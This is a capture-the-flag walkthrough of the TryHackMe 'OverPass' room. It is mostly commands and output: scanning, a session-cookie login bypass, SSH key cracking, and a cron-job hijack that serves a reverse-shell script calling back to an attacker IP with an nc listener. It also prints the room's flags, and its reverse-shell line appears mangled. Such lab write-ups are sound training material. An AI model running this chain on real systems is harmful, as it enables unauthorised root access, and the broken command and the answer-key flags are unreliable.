Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


06/11/2024 Shad Hussain Knowledge Views 172 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - OverPass - THM 

Room Link : https://tryhackme.com/room/overpass


STEP1
nmap -p- -sSV 10.10.101.201 -Pn -A -T4
FINDING
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
-----------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.101.201/ 
FINDING
== DIRECTORY: http://10.10.101.201/aboutus/                                                                               
+ http://10.10.101.201/admin (CODE:301|SIZE:42)                                                                            
== DIRECTORY: http://10.10.101.201/css/                                                                                   
== DIRECTORY: http://10.10.101.201/downloads/                                                                             
== DIRECTORY: http://10.10.101.201/img/                                                                                   
+ http://10.10.101.201/index.html (CODE:301|SIZE:0)                                                                                                                                                                                        
---- Entering directory: http://10.10.101.201/aboutus/ ----
+ http://10.10.101.201/aboutus/index.html (CODE:301|SIZE:0)                                                                                                                                                                                          
---- Entering directory: http://10.10.101.201/css/ ----
+ http://10.10.101.201/css/index.html (CODE:301|SIZE:0)                                                                                                                                                                                             
---- Entering directory: http://10.10.101.201/downloads/ ----
+ http://10.10.101.201/downloads/index.html (CODE:301|SIZE:0)                                                              
+ http://10.10.101.201/downloads/src (CODE:301|SIZE:0)                                                                                                                                                                                                
---- Entering directory: http://10.10.101.201/img/ ----
+ http://10.10.101.201/img/index.html (CODE:301|SIZE:0)   
-----------------------------------------------------------------------------------------------
STEP3
http://10.10.101.201/admin

moniter the source you will see a login.js file in the source 
open the login.js file and read it
FINDING
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
if we set the Cookies.set("SessionToken",statusOrCookie)
then we can login
-----------------------------------------------------------------------------------------------
STEP4
install cookie editer
https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/?utm_campaign=external-cookie-editor.com

install it and add extention to the browser
add the cookie Cookies.set("SessionToken",statusOrCookie)
refresh the login page and you willbe loged in
-----------------------------------------------------------------------------------------------
STEP5
copy the key in a file called "ovp.txt" and use ssh2john to convert it into hash for the user "James"
cd /usr/share/john
./ssh2john.py /root/Desktop/ovp.txt  /root/Desktop/ovpcrack
john /root/Desktop/ovpcrack --wordlist=/usr/share/wordlists/rockyou.txt
FINDING
james13
-----------------------------------------------------------------------------------------------
STEP6
rename ovp.txt to ovp
chmod 600 ovp
ssh [email protected] -i ovp
with password : james13
-----------------------------------------------------------------------------------------------
STEP7
ls -la
cat user.txt
FINDING
thm{65c1aaf000506e56996822c6281e6bf7}
-----------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
-----------------------------------------------------------------------------------------------
STEP9
nano /etc/hosts
10.17.65.196 overpass.thm
ip will be attacker ip
save it
ctrl+x
ctrl+y
enter
-----------------------------------------------------------------------------------------------
STEP10
on attacker machine create folder on desktop 
/download/src/buildscript.sh
write in buildscript.sh
#!/bin/bash
bash -c "bash -i & /dev/tcp/10.6.63.158/4444 0&1"  -- ip will be of attacker ip
save it
-----------------------------------------------------------------------------------------------
STEP11
start a python server on attacker desktop
python3 -m http.server 80
open a nc listner on new terminal
nc -nvlp 4444
wait for few mins you will get a revers shell on new terminal which will be root
-----------------------------------------------------------------------------------------------
STEP12
on new terminal
ls -la
cat root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}
whoami
root
-----------------------------------------------------------------------------------------------

Related articles
05.11.2024 Gauri singh Readers 96
THE BENEFITS OF LOVING SOMEONE  1. IT MAKES GOOD USE OF THE MANS ERECTION Most men wake up with an erection, i .....
01.11.2024 Shad Hussain Readers 84
CTF Walk Through - Dav - THM  Room Link : https://tryhackme.com/r/room/bsidesgtdav STEP1 nmap -p- -Pn -A .....
31.10.2024 Shad Hussain Readers 97
CTF Walk Through - Anonforce - THM  Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce STEP1 nmap -p- -P .....
31.10.2024 Shad Hussain Readers 131
CTF Walk Through - Thompson - THM  Room link : https://tryhackme.com/r/room/bsidesgtthompson STEP1 nmap -p- -P .....
30.10.2024 Shad Hussain Readers 244
CTF Walk Through - Ignite- THM  Room Link : https://tryhackme.com/r/room/ignite STEP1 nmap -p- -Pn -A -T4 - .....
K 28.10.2024 Kajal sah Readers 319
एक अंग   सबसे महत्वपूर्ण एवं अनिवार्य कौशल संचार कौशल है। जिसके माध्यम से आप पूरी दुनिया .....
28.10.2024 Shad Hussain Readers 295
CTF Walk Through - Library - THM   Room Link : https://tryhackme.com/r/room/bsidesgtlibrary STEP1 nmap -p- -Pn .....
27.10.2024 Shad Hussain Readers 232
CTF Walk Through - Bounty Hacker - THM   Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. .....
26.10.2024 Shad Hussain Readers 291
CTF Walk Through - Easy Peasy - THM  Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A .....
 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved